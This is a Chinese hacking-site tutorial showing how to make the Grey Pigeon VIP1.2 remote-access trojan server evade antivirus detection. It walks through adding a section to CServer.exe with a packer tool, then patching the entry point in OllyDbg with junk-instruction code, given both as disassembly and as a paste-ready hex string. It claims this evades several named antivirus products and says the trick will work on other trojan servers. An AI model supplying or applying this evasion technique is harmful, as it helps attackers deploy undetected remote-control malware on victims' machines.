繁体中文  设为首页  加入收藏 
学院首页 | 入门 | 技巧 | 研究 | 实战 | 防护 | 开发 | 专题
当前位置:学院首页 >> 实战 >> 免杀挂马 >> 一条花指令打造灰鸽子VIP1.2全免杀服务端


一条花指令打造灰鸽子VIP1.2全免杀服务端

2008-04-28 16:13:41  www.hackbase.com  来源:撼天雷空间
今天晚上正好有点空闲,又把灰鸽子VIP1.2撼天雷免杀版拿出来看了看,呵呵,2007年3月18日发出来,到目前为止,还是免杀的,好了,言规正传。 我心血来潮,想到来个不加壳、不改特征码,写一条花指 ...

      今天晚上正好有点空闲,又把灰鸽子VIP1.2撼天雷免杀版拿出来看了看,呵呵,2007年3月18日发出来,到目前为止,还是免杀的,好了,言规正传。

      我心血来潮,想到来个不加壳、不改特征码,写一条花指令来达到服务端全免杀(当然只是文件免杀,不含内存免杀)。

      操作要求:懂得OllyDbg软件的一点应用(一点不懂的不建议,就不需看下去了)


      准备工具:木马彩衣免杀版
                          OllyDbg
                         无壳服务端生成文件 CServer.exe

       具体步骤:1、穿上不免杀的花指令。运行木马彩衣免杀版,点“浏览”选中文件“CServer.exe”,在“区段名”处填上“HTL”、在“区段大小”处填上“20”,最后点“穿上”,关闭木马彩衣免杀版。PEiD查壳为“C++6”。

        2、打造全免杀的花指令。这个文件试都不用试,肯定被查杀的,用OllyDbg打开CServer.exe,它会自动停止在,木马彩衣免杀版所加的花指令入口处,于是将CServer.exe文件里面的花指令,直接修改成以下花指令代码-----


004E1029 <ModuleEntryPoin> 55                      PUSH EBP
004E102A                     8BEC                    MOV EBP,ESP
004E102C                     6A FF                   PUSH -1
004E102E                     90                      NOP
004E102F                     90                      NOP
004E1030                     90                      NOP
004E1031                     90                      NOP
004E1032                     90                      NOP
004E1033                     90                      NOP
004E1034                     90                      NOP
004E1035                     90                      NOP
004E1036                     90                      NOP
004E1037                     90                      NOP
004E1038                     64:A1 00000000          MOV EAX,DWORD PTR FS:[0]
004E103E                     50                      PUSH EAX
004E103F                     64:8925 00000000        MOV DWORD PTR FS:[0],ESP
004E1046                     83EC 68                 SUB ESP,68
004E1049                     53                      PUSH EBX
004E104A                     90                      NOP
004E104B                     90                      NOP
004E104C                     90                      NOP
004E104D                     90                      NOP
004E104E                     90                      NOP
004E104F                     83C4 68                 ADD ESP,68
004E1052                     90                      NOP
004E1053                     67:64:A3 0000           MOV DWORD PTR FS:[0],EAX
004E1058                     58                      POP EAX
004E1059                     58                      POP EAX
004E105A                     0000                    ADD BYTE PTR DS:[EAX],AL
004E105C                     0000                    ADD BYTE PTR DS:[EAX],AL
004E105E                     90                      NOP
004E105F                     90                      NOP
004E1060                     90                      NOP
004E1061                     90                      NOP
004E1062                     90                      NOP
004E1063                     90                      NOP
004E1064                     90                      NOP
004E1065                     90                      NOP
004E1066                     90                      NOP
004E1067                     90                      NOP
004E1068                     90                      NOP
004E1069                     90                      NOP
004E106A                     8BEC                    MOV EBP,ESP
004E106C                     83EC 0C                 SUB ESP,0C
004E106F                     83EC F4                 SUB ESP,-0C
004E1072                     50                      PUSH EAX
004E1073                     B8 90D94B00             MOV EAX,CServer.004BD990
004E1078                     50                      PUSH EAX
004E1079                     90                      NOP
004E107A                     90                      NOP
004E107B                     90                      NOP
004E107C                     90                      NOP
004E107D                     90                      NOP
004E107E                     90                      NOP
004E107F                     C3                      RETN


    或者直接复制以下二进制代码,粘贴在原代码处----

55 8B EC 6A FF 90 90 90 90 90 90 90 90 90 90 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83EC 68 53 90 90 90 90 90 83 C4 68 90 67 64 A3 00 00 58 58 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 8B EC 83 EC 0C 83 EC F4 50 B8 90 D9 4B 00 50 90 90 90 90 90 90 C3


,把修改或粘贴代码处,用鼠标选住,在OllyDbg窗口处,点右键选择“复制可执行文件”--“选择部分”,对跳出来的窗口处,点右键选择“保存文件”,即可。PEiD查壳为“Borland Delphi 6.0 - 7.0”。


      杀软测试,咔吧、金山、瑞星、若顿(只安装了这些)全部免杀,大功告成,一条花指令打造灰鸽子VIP1.2全免杀服务端。

     结束语:这条花指令用在别的服务端上,我相信也会是好用的。当然有的朋友可能过几天或者更长的时间,才看到和用到这条花指令,不免杀了,会说没用,其实有一点,你应该明白,免杀的东西一公布,过不了很久就会被杀的,请别说那些“你的免杀不了多久”等等很菜的话,你会看到,杀软公司的人也会看到,不然他们怎么去赚银子呢?我写这篇文章的目的只是告诉各位朋友,如何去将一个没用的花指令,去用活来。

 

关键字:免杀

责任编辑:黑客基地        



本文引用网址: 

一条花指令打造灰鸽子VIP1.2全免杀服务端的相关文章
发表评论